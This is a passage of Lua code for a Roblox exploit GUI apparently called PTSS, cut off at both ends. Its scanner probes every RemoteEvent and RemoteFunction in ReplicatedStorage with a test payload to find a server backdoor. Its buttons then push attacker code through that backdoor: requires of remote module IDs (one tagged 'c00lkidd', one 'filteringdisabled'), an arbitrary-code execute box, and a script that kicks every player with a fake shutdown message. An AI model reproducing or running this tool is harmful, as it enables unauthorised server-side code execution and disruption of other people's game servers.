G2L["a8"]["Name"] = [[Title]];


-- StarterGui.ScreenGui.Notify.Frame.Main.Title.UIStroke
G2L["a9"] = Instance.new("UIStroke", G2L["a8"]);



-- StarterGui.ScreenGui.Notify.Frame.Main.TextBox
G2L["aa"] = Instance.new("TextLabel", G2L["a7"]);
G2L["aa"]["TextWrapped"] = true;
G2L["aa"]["BorderSizePixel"] = 0;
G2L["aa"]["TextSize"] = 14;
G2L["aa"]["TextScaled"] = true;
G2L["aa"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["aa"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["aa"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["aa"]["BackgroundTransparency"] = 1;
G2L["aa"]["Size"] = UDim2.new(1, 0, 0.72, 0);
G2L["aa"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["aa"]["Text"] = [[Backdoor found! Backdoor name: Verifying...]];
G2L["aa"]["Name"] = [[TextBox]];
G2L["aa"]["Position"] = UDim2.new(0, 0, 0.28, 0);


-- StarterGui.ScreenGui.Notify.Frame.Main.TextBox.UIStroke
G2L["ab"] = Instance.new("UIStroke", G2L["aa"]);



-- StarterGui.ScreenGui.Notify.CoreFunctionsNotifier
G2L["ac"] = Instance.new("LocalScript", G2L["a0"]);
G2L["ac"]["Name"] = [[CoreFunctionsNotifier]];


-- StarterGui.ScreenGui.Notify.ExecuteEvent
G2L["ad"] = Instance.new("BindableEvent", G2L["a0"]);
G2L["ad"]["Name"] = [[ExecuteEvent]];


-- StarterGui.ScreenGui.Notify.SpawnEvent
G2L["ae"] = Instance.new("BindableEvent", G2L["a0"]);
G2L["ae"]["Name"] = [[SpawnEvent]];


-- StarterGui.ScreenGui.Notify.R6Event
G2L["af"] = Instance.new("BindableEvent", G2L["a0"]);
G2L["af"]["Name"] = [[R6Event]];


-- StarterGui.ScreenGui.Notify.TextClear
G2L["b0"] = Instance.new("BindableEvent", G2L["a0"]);
G2L["b0"]["Name"] = [[TextClear]];


-- StarterGui.ScreenGui.TextButton
G2L["b1"] = Instance.new("TextButton", G2L["1"]);
G2L["b1"]["TextWrapped"] = true;
G2L["b1"]["BorderSizePixel"] = 0;
G2L["b1"]["TextSize"] = 14;
G2L["b1"]["TextScaled"] = true;
G2L["b1"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b1"]["BackgroundColor3"] = Color3.fromRGB(81, 81, 81);
G2L["b1"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["b1"]["Size"] = UDim2.new(0.2126, 0, 0.0396, 0);
G2L["b1"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b1"]["Text"] = [[Open PTSS]];
G2L["b1"]["Visible"] = false;
G2L["b1"]["Position"] = UDim2.new(0.40519, 0, 0.00866, 0);


-- StarterGui.ScreenGui.TextButton.UICorner
G2L["b2"] = Instance.new("UICorner", G2L["b1"]);



-- StarterGui.ScreenGui.TextButton.UIStroke
G2L["b3"] = Instance.new("UIStroke", G2L["b1"]);



-- StarterGui.ScreenGui.TextButton.UIStroke
G2L["b4"] = Instance.new("UIStroke", G2L["b1"]);
G2L["b4"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["b4"]["Thickness"] = 2;


-- StarterGui.ScreenGui.TextButton.LocalScript
G2L["b5"] = Instance.new("LocalScript", G2L["b1"]);



-- Require G2L wrapper
local G2L_REQUIRE = require;
local G2L_MODULES = {};
local function require(Module:ModuleScript)
    local ModuleState = G2L_MODULES[Module];
    if ModuleState then
        if not ModuleState.Required then
            ModuleState.Required = true;
            ModuleState.Value = ModuleState.Closure();
        end
        return ModuleState.Value;
    end;
    return G2L_REQUIRE(Module);
end

G2L_MODULES[G2L["7c"]] = {
Closure = function()
    local script = G2L["7c"];--// NotificationModule  FINAL PERFECT VERSION (Full Override + Fixed 4 Seconds)
--// ModuleScript (place anywhere, e.g. ReplicatedStorage)

local TweenService = game:GetService("TweenService")

local Notification = {}

-- Config
local TWEEN_INFO = TweenInfo.new(0.35, Enum.EasingStyle.Quint, Enum.EasingDirection.Out)
local HIDDEN     = UDim2.new(1, 0, 0.856, 0)
local VISIBLE    = UDim2.new(0.752, 0, 0.861, 0)

-- Shared sound (one instance, reused)
local sound = Instance.new("Sound", game:GetService("SoundService"))
sound.SoundId = "rbxassetid://7383525713"
sound.Volume = 1

-- Per-frame state tracking
local activeFrames = {}  -- [frame] = {currentTween, hideTask}

-- Private helpers
local function setText(frame, text)
	local main = frame:FindFirstChild("Main")
	if not main then return end
	local label = main:FindFirstChild("TextBox") or main:FindFirstChild("Text") or main:FindFirstChild("TextLabel")
	if label then
		label.Text = text
	end
end

local function cancelExisting(frame)
	local state = activeFrames[frame]
	if not state then return end
	
	if state.currentTween then
		state.currentTween:Cancel()
	end
	if state.hideTask then
		task.cancel(state.hideTask)
	end
	
	activeFrames[frame] = nil
end

-- Public function
function Notification.Notify(frame, message)
	if not frame or not frame:IsA("GuiObject") then return end
	
	-- FULL OVERRIDE: kill anything currently happening on this frame
	cancelExisting(frame)
	
	-- Update text instantly
	setText(frame, message)
	
	-- Always start from hidden  clean slide-in
	frame.Position = HIDDEN
	
	-- Slide in
	local tweenIn = TweenService:Create(frame, TWEEN_INFO, {Position = VISIBLE})
	tweenIn:Play()
	sound:Play()
	
	-- Start fresh 4-second timer (never extends)
	local hideTask = task.delay(4, function()
		local tweenOut = TweenService:Create(frame, TWEEN_INFO, {Position = HIDDEN})
		tweenOut:Play()
		activeFrames[frame] = nil
	end)
	
	-- Store state
	activeFrames[frame] = {
		currentTween = tweenIn,
		hideTask = hideTask
	}
end

return Notification
end;
};
-- StarterGui.ScreenGui.Scanner
local function C_2()
local script = G2L["2"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local starterGui = game:GetService("StarterGui")
	local players = game:GetService("Players")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame"):FindFirstChild("page2")
	local username = players.LocalPlayer.Name
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("Text"):FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	local r6Button = frame:FindFirstChild("R6")
	local statusLabel = script.Parent.Frame.page1.Status
	
	if not textbox or not executeButton or not clearButton or not injectButton or not r6Button or not statusLabel then
		warn("Missing GUI components.")
		return
	end
	
	-- Global storage using getgenv()
	getgenv().confirmedBackdoor = nil
	getgenv().confirmedType = nil
	
	injectButton.MouseButton1Click:Connect(function()
		
		local testPayload = 'local m = Instance.new("Part") m.Parent = game.Lighting m.Name = "backdoormodulepart"'
		local found = false
		
		for _, obj in ipairs(replicatedStorage:GetDescendants()) do
			if obj:IsA("RemoteEvent") or obj:IsA("RemoteFunction") then
				-- Clean up any previous test parts
				for _, p in ipairs(workspace:GetChildren()) do
					if p:IsA("BasePart") and p.Name == "backdoor" then
						p:Destroy()
					end
				end
				
				-- Attempt to trigger the remote
				pcall(function()
					if obj:IsA("RemoteEvent") then
						obj:FireServer(testPayload)
					elseif obj:IsA("RemoteFunction") then
						obj:InvokeServer(testPayload)
					end
				end)
				
				wait(0.5)
				
				-- Check for the test part
				for _, p in ipairs(game.Lighting:GetChildren()) do
					if p:IsA("BasePart") and p.Name == "backdoormodulepart" then
						print("backdoor confirmed through " .. obj.ClassName .. ": " .. obj:GetFullName())
						getgenv().confirmedBackdoor = obj
						getgenv().confirmedType = obj.ClassName
						found = true
						
						pcall(function()
							script.Parent.Notify.SuccessEvent:Fire(obj)
							
							-- Client-side hint (only visible to local player)
						end)
						
						statusLabel.Text = "status: injected"
						statusLabel.TextColor3 = Color3.fromRGB(0, 255, 127)
						break
					end
				end
				
				if found then break end
			end
		end
		
		if not found then
			print("no backdoor confirmed, better luck next time!")
			statusLabel.Text = "status: no backdoor detected."
			statusLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
			
			script.Parent.Notify.UnSuccessEvent:Fire()
		end
	end)
	
	executeButton.MouseButton1Click:Connect(function()
		script.Parent.Notify.ExecuteEvent:Fire()
		local payload = textbox.Text
		if payload and payload ~= "" and getgenv().confirmedBackdoor then
			pcall(function()
				if getgenv().confirmedType == "RemoteEvent" then
					getgenv().confirmedBackdoor:FireServer(payload)
				elseif getgenv().confirmedType == "RemoteFunction" then
					getgenv().confirmedBackdoor:InvokeServer(payload)
				end
			end)
		end
	end)
	
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		warn("textbox wiped clean like grandma cookies")
		script.Parent.Notify.TextClear:Fire()
	end)
	
	r6Button.MouseButton1Click:Connect(function()
		if getgenv().confirmedBackdoor then
			local r6Payload = 'require(3436957371):r6("' .. username .. '")'
			pcall(function()
				if getgenv().confirmedType == "RemoteEvent" then
					getgenv().confirmedBackdoor:FireServer(r6Payload)
				elseif getgenv().confirmedType == "RemoteFunction" then
					getgenv().confirmedBackdoor:InvokeServer(r6Payload)
				end
			end)
		end
		
		script.Parent.Notify.R6Event:Fire()
	end)
	
	frame.RE.MouseButton1Click:Connect(function()
		if getgenv().confirmedBackdoor then
			local REPayload = 'game.Players.' .. username .. ':LoadCharacter()'
			if getgenv().confirmedType == "RemoteEvent" then
				getgenv().confirmedBackdoor:FireServer(REPayload)
			elseif getgenv().confirmedType == "RemoteFunction" then
				getgenv().confirmedBackdoor:InvokeServer(REPayload)
			end
		end
		script.Parent.Notify.SpawnEvent:Fire()
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.Frame.Dragify
local function C_4()
local script = G2L["4"];
	local frame = script.Parent
	local UIS = game:GetService("UserInputService")
	
	local dragging = false
	local dragStart = nil
	local startPos = nil
	
	-- When mouse or touch begins
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = frame.Position
		end
	end)
	
	-- When mouse or touch ends
	frame.InputEnded:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = false
		end
	end)
	
	-- Update position while dragging
	UIS.InputChanged:Connect(function(input)
		if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
			local delta = input.Position - dragStart
			frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		end
	end)
end;
task.spawn(C_4);
-- StarterGui.ScreenGui.Frame.TextLabel.ImageButton.LocalScript
local function C_b()
local script = G2L["b"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent.Frame.Visible = false
		script.Parent.Parent.Parent.Parent.TextButton.Visible = true
	end)
end;
task.spawn(C_b);
-- StarterGui.ScreenGui.Frame.page1.ImageLabel.LocalScript
local function C_10()
local script = G2L["10"];
	-- Place this LocalScript inside the ImageLabel
	local Players = game:GetService("Players")
	local imageLabel = script.Parent
	local player = Players.LocalPlayer
	
	-- Wait until the player is fully loaded
	if not player.Character then
		player.CharacterAdded:Wait()
	end
	
	-- Get the player's thumbnail
	local function updateThumbnail()
		local userId = player.UserId
		local thumbnailType = Enum.ThumbnailType.HeadShot
		local thumbnailSize = Enum.ThumbnailSize.Size420x420
		
		local content, isReady = Players:GetUserThumbnailAsync(userId, thumbnailType, thumbnailSize)
		if isReady then
			imageLabel.Image = content
		end
	end
	
	updateThumbnail()
end;
task.spawn(C_10);
-- StarterGui.ScreenGui.Frame.page1.TextLabel.LocalScript
local function C_13()
local script = G2L["13"];
	script.Parent.Text = 'Welcome, ' .. game.Players.LocalPlayer.Name .. '!'
end;
task.spawn(C_13);
-- StarterGui.ScreenGui.Frame.page1.TextLabel.LocalScript
local function C_1c()
local script = G2L["1c"];
	local Players = game:GetService("Players")
	local localPlayer = Players.LocalPlayer
	
	local textLabel = script.Parent
	
	-- Update the label with account age in days
	textLabel.Text = "Age days: " .. tostring(localPlayer.AccountAge) .. " Days"
end;
task.spawn(C_1c);
-- StarterGui.ScreenGui.Frame.page1.TextButton.LocalScript
local function C_21()
local script = G2L["21"];
	--// FIXED: Sound plays only ONCE + safer parent lookup
	--// LocalScript inside your TextButton/ImageButton
	
	local Players = game:GetService("Players")
	local SoundService = game:GetService("SoundService")
	local player = Players.LocalPlayer
	local username = player.Name
	local button = script.Parent
	
	-- Safer way to get the event (works even if hierarchy changes a bit)
	local ScreenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local ScriptRanEvent = ScreenGui and ScreenGui:FindFirstChild("Notify") and ScreenGui.Notify:FindFirstChild("ScriptRanEvent")
	
	-- Prevent double fires from mobile + mouse
	local debounce = false
	
	button.MouseButton1Click:Connect(function()
		if debounce then return end
		debounce = true
		
		-- Show notification
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the script
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = 'require(113386755545638).load("' .. username .. '")'
			
			if backdoorType == "RemoteEvent" then
				spawn(function() pcall(function() backdoor:FireServer(rawcode) end) end)
			elseif backdoorType == "RemoteFunction" then
				spawn(function() pcall(function() backdoor:InvokeServer(rawcode) end) end)
			end
		end
		
		-- Re-enable after a tiny delay (prevents mobile double-tap issue)
		task.wait(0.1)
		debounce = false
	end)
end;
task.spawn(C_21);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_2c()
local script = G2L["2c"];
	--// FIXED: Sound plays only ONCE + safer parent lookup
	--// LocalScript inside your TextButton/ImageButton
	
	local Players = game:GetService("Players")
	local SoundService = game:GetService("SoundService")
	local player = Players.LocalPlayer
	local username = player.Name
	local button = script.Parent
	
	-- Safer way to get the event (works even if hierarchy changes a bit)
	local ScreenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local ScriptRanEvent = ScreenGui and ScreenGui:FindFirstChild("Notify") and ScreenGui.Notify:FindFirstChild("ScriptRanEvent")
	
	-- Prevent double fires from mobile + mouse
	local debounce = false
	
	button.MouseButton1Click:Connect(function()
		if debounce then return end
		debounce = true
		
		-- Show notification
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the script
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = 'require(14125553864):Fire("' .. username .. '","c00lkidd")'
			
			if backdoorType == "RemoteEvent" then
				spawn(function() pcall(function() backdoor:FireServer(rawcode) end) end)
			elseif backdoorType == "RemoteFunction" then
				spawn(function() pcall(function() backdoor:InvokeServer(rawcode) end) end)
			end
		end
		
		-- Re-enable after a tiny delay (prevents mobile double-tap issue)
		task.wait(0.1)
		debounce = false
	end)
end;
task.spawn(C_2c);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_30()
local script = G2L["30"];
	--// Clean & Silent Execute Button (No StarterGui, Auto Fires ScriptRanEvent)
	--// Place this LocalScript inside your TextButton (or ImageButton)
	
	local Players = game:GetService("Players")
	local player = Players.LocalPlayer
	local username = player.Name
	
	local button = script.Parent
	
	-- Go 5 parents up  reaches your ScreenGui that has the Notify folder with ScriptRanEvent
	local ScriptRanEvent = button:FindFirstAncestorOfClass("ScreenGui"):FindFirstChild("Notify"):WaitForChild("ScriptRanEvent")
	
	button.MouseButton1Click:Connect(function()
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the actual script through the backdoor (if it exists)
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = 'require(109454557236910).customchat()'
			
			if backdoorType == "RemoteEvent" then
				pcall(function() backdoor:FireServer(rawcode) end)
			elseif backdoorType == "RemoteFunction" then
				pcall(function() backdoor:InvokeServer(rawcode) end)
			end
		end
	end)
end;
task.spawn(C_30);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_34()
local script = G2L["34"];
	--// FIXED: Sound plays only ONCE + safer parent lookup
	--// LocalScript inside your TextButton/ImageButton
	
	local Players = game:GetService("Players")
	local SoundService = game:GetService("SoundService")
	local player = Players.LocalPlayer
	local username = player.Name
	local button = script.Parent
	
	-- Safer way to get the event (works even if hierarchy changes a bit)
	local ScreenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local ScriptRanEvent = ScreenGui and ScreenGui:FindFirstChild("Notify") and ScreenGui.Notify:FindFirstChild("ScriptRanEvent")
	
	-- Prevent double fires from mobile + mouse
	local debounce = false
	
	button.MouseButton1Click:Connect(function()
		if debounce then return end
		debounce = true
		
		-- Show notification
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the script
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = 'require(9978015219).filteringdisabled("' .. username .. '")'
			
			if backdoorType == "RemoteEvent" then
				spawn(function() pcall(function() backdoor:FireServer(rawcode) end) end)
			elseif backdoorType == "RemoteFunction" then
				spawn(function() pcall(function() backdoor:InvokeServer(rawcode) end) end)
			end
		end
		
		-- Re-enable after a tiny delay (prevents mobile double-tap issue)
		task.wait(0.1)
		debounce = false
	end)
end;
task.spawn(C_34);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_38()
local script = G2L["38"];
	--// FIXED: Sound plays only ONCE + safer parent lookup
	--// LocalScript inside your TextButton/ImageButton
	
	local Players = game:GetService("Players")
	local SoundService = game:GetService("SoundService")
	local player = Players.LocalPlayer
	local username = player.Name
	local button = script.Parent
	
	-- Safer way to get the event (works even if hierarchy changes a bit)
	local ScreenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local ScriptRanEvent = ScreenGui and ScreenGui:FindFirstChild("Notify") and ScreenGui.Notify:FindFirstChild("ScriptRanEvent")
	
	-- Prevent double fires from mobile + mouse
	local debounce = false
	
	button.MouseButton1Click:Connect(function()
		if debounce then return end
		debounce = true
		
		-- Show notification
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the script
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = 'require(2609384717).load("' .. username .. '")'
			
			if backdoorType == "RemoteEvent" then
				spawn(function() pcall(function() backdoor:FireServer(rawcode) end) end)
			elseif backdoorType == "RemoteFunction" then
				spawn(function() pcall(function() backdoor:InvokeServer(rawcode) end) end)
			end
		end
		
		-- Re-enable after a tiny delay (prevents mobile double-tap issue)
		task.wait(0.1)
		debounce = false
	end)
end;
task.spawn(C_38);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_3c()
local script = G2L["3c"];
	--// FIXED: Sound plays only ONCE + safer parent lookup
	--// LocalScript inside your TextButton/ImageButton
	
	local Players = game:GetService("Players")
	local SoundService = game:GetService("SoundService")
	local player = Players.LocalPlayer
	local username = player.Name
	local button = script.Parent
	
	-- Safer way to get the event (works even if hierarchy changes a bit)
	local ScreenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local ScriptRanEvent = ScreenGui and ScreenGui:FindFirstChild("Notify") and ScreenGui.Notify:FindFirstChild("ScriptRanEvent")
	
	-- Prevent double fires from mobile + mouse
	local debounce = false
	
	button.MouseButton1Click:Connect(function()
		if debounce then return end
		debounce = true
		
		-- Show notification
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the script
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = 'require(7192763922).load("' .. username .. '")'
			
			if backdoorType == "RemoteEvent" then
				spawn(function() pcall(function() backdoor:FireServer(rawcode) end) end)
			elseif backdoorType == "RemoteFunction" then
				spawn(function() pcall(function() backdoor:InvokeServer(rawcode) end) end)
			end
		end
		
		-- Re-enable after a tiny delay (prevents mobile double-tap issue)
		task.wait(0.1)
		debounce = false
	end)
end;
task.spawn(C_3c);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_40()
local script = G2L["40"];
	--// FIXED: Sound plays only ONCE + safer parent lookup
	--// LocalScript inside your TextButton/ImageButton
	
	local Players = game:GetService("Players")
	local SoundService = game:GetService("SoundService")
	local player = Players.LocalPlayer
	local username = player.Name
	local button = script.Parent
	
	-- Safer way to get the event (works even if hierarchy changes a bit)
	local ScreenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local ScriptRanEvent = ScreenGui and ScreenGui:FindFirstChild("Notify") and ScreenGui.Notify:FindFirstChild("ScriptRanEvent")
	
	-- Prevent double fires from mobile + mouse
	local debounce = false
	
	button.MouseButton1Click:Connect(function()
		if debounce then return end
		debounce = true
		
		-- Show notification
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the script
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = ' require(7804327506).amigodogodenot123("' .. username .. '")'
			
			if backdoorType == "RemoteEvent" then
				spawn(function() pcall(function() backdoor:FireServer(rawcode) end) end)
			elseif backdoorType == "RemoteFunction" then
				spawn(function() pcall(function() backdoor:InvokeServer(rawcode) end) end)
			end
		end
		
		-- Re-enable after a tiny delay (prevents mobile double-tap issue)
		task.wait(0.1)
		debounce = false
	end)
end;
task.spawn(C_40);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_44()
local script = G2L["44"];
	--// FIXED: Sound plays only ONCE + safer parent lookup
	--// LocalScript inside your TextButton/ImageButton
	
	local Players = game:GetService("Players")
	local SoundService = game:GetService("SoundService")
	local player = Players.LocalPlayer
	local username = player.Name
	local button = script.Parent
	
	-- Safer way to get the event (works even if hierarchy changes a bit)
	local ScreenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local ScriptRanEvent = ScreenGui and ScreenGui:FindFirstChild("Notify") and ScreenGui.Notify:FindFirstChild("ScriptRanEvent")
	
	-- Prevent double fires from mobile + mouse
	local debounce = false
	
	button.MouseButton1Click:Connect(function()
		if debounce then return end
		debounce = true
		
		-- Show notification
		if ScriptRanEvent then
			ScriptRanEvent:Fire()
		end
		
		-- Execute the script
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if backdoor and backdoorType then
			local rawcode = [[for _, p in ipairs(game.Players:GetPlayers()) do
			p:Kick("This server has been shut down.")
			end]]
			
			if backdoorType == "RemoteEvent" then
				spawn(function() pcall(function() backdoor:FireServer(rawcode) end) end)
			elseif backdoorType == "RemoteFunction" then
				spawn(function() pcall(function() backdoor:InvokeServer(rawcode) end) end)
			end
		end
		
		-- Re-enable after a tiny delay (prevents mobile double-tap issue)
		task.wait(0.1)
		debounce = false
	end)
end;
task.spawn(C_44);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_48()
local script = G2L["48"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = true
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_48);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_4b()
local script = G2L["4b"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = true
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_4b);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_4e()
local script = G2L["4e"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = true
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_4e);
-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame.LocalScript
local function C_52()
local script = G2L["52"];
	local scrollingFrame = script.Parent
	local LogService = game:GetService("LogService")
	
	-- Format time
	local function getTimeStamp()
		local t = os.date("*t")
		return string.format("%02d:%02d:%02d", t.hour, t.min, t.sec)
	end
	
	-- Create a new label for each log line
	local function addLogLine(text, color)
		local label = Instance.new("TextLabel")
		label.Name = "LOG"
		label.Text = text
		label.TextColor3 = color
		label.BackgroundTransparency = 1
		label.Font = Enum.Font.Code
		label.TextSize = 14
		label.TextWrapped = true
		label.Size = UDim2.new(1, -10, 0, 0)
		label.AutomaticSize = Enum.AutomaticSize.Y
		label.Parent = scrollingFrame
		
		-- Apply default UIStroke
		local stroke = Instance.new("UIStroke")
		stroke.Parent = label
	end
	
	-- Listen to all console output
	LogService.MessageOut:Connect(function(message, messageType)
		if message == "Hello world!" then return end --  Skip exact match
		
		local timestamp = getTimeStamp()
		local color = Color3.fromRGB(255, 255, 255)
		
		if messageType == Enum.MessageType.MessageWarning then
			color = Color3.fromRGB(255, 217, 0)
		elseif messageType == Enum.MessageType.MessageError then
			color = Color3.fromRGB(179, 0, 0)
		end
		
		local fullText = "[" .. timestamp .. "] " .. message
		addLogLine(fullText, color)
	end)
end;
task.spawn(C_52);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_55()
local script = G2L["55"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = true
		script.Parent.Parent.page5.Visible = false
	end)
end;
task.spawn(C_55);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_5f()
local script = G2L["5f"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	end)
end;
task.spawn(C_5f);
-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
local function C_62()
local script = G2L["62"];
	script.Parent.MouseButton1Click:Connect(function()
		local Notification = require(script.Parent.Parent.NotifierModule)
		
		local frame = script.Parent.Parent.Parent.Parent.Notify.Frame
		
		-- Start hidden
		frame.Position = UDim2.new(1, 0, 0.856, 0)
		
		-- Call notifications whenever you want:
		Notification.Notify(frame, "Changed background color to Default!")
	end)
end;
task.spawn(C_62);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_64()
local script = G2L["64"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
	end)
end;
task.spawn(C_64);
-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
local function C_67()
local script = G2L["67"];
	script.Parent.MouseButton1Click:Connect(function()
		local Notification = require(script.Parent.Parent.NotifierModule)
		
		local frame = script.Parent.Parent.Parent.Parent.Notify.Frame
		
		-- Start hidden
		frame.Position = UDim2.new(1, 0, 0.856, 0)
		
		-- Call notifications whenever you want:
		Notification.Notify(frame, "Changed background color to Red!")
	end)
end;
task.spawn(C_67);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_69()
local script = G2L["69"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
	end)
end;
task.spawn(C_69);
-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
local function C_6c()
local script = G2L["6c"];
	script.Parent.MouseButton1Click:Connect(function()
		local Notification = require(script.Parent.Parent.NotifierModule)
		
		local frame = script.Parent.Parent.Parent.Parent.Notify.Frame
		
		-- Start hidden
		frame.Position = UDim2.new(1, 0, 0.856, 0)
		
		-- Call notifications whenever you want:
		Notification.Notify(frame, "Changed background color to Blue!")
	end)
end;
task.spawn(C_6c);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_6e()
local script = G2L["6e"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(85, 255, 0)
	end)
end;
task.spawn(C_6e);
-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
local function C_71()
local script = G2L["71"];
	script.Parent.MouseButton1Click:Connect(function()
		local Notification = require(script.Parent.Parent.NotifierModule)
		
		local frame = script.Parent.Parent.Parent.Parent.Notify.Frame
		
		-- Start hidden
		frame.Position = UDim2.new(1, 0, 0.856, 0)
		
		-- Call notifications whenever you want:
		Notification.Notify(frame, "Changed background color to Green!")
	end)
end;
task.spawn(C_71);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_73()
local script = G2L["73"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	end)
end;
task.spawn(C_73);
-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
local function C_76()
local script = G2L["76"];
	script.Parent.MouseButton1Click:Connect(function()
		local Notification = require(script.Parent.Parent.NotifierModule)
		
		local frame = script.Parent.Parent.Parent.Parent.Notify.Frame
		
		-- Start hidden
		frame.Position = UDim2.new(1, 0, 0.856, 0)
		
		-- Call notifications whenever you want:
		Notification.Notify(frame, "Changed background color to White!")
	end)
end;
task.spawn(C_76);
-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
local function C_78()
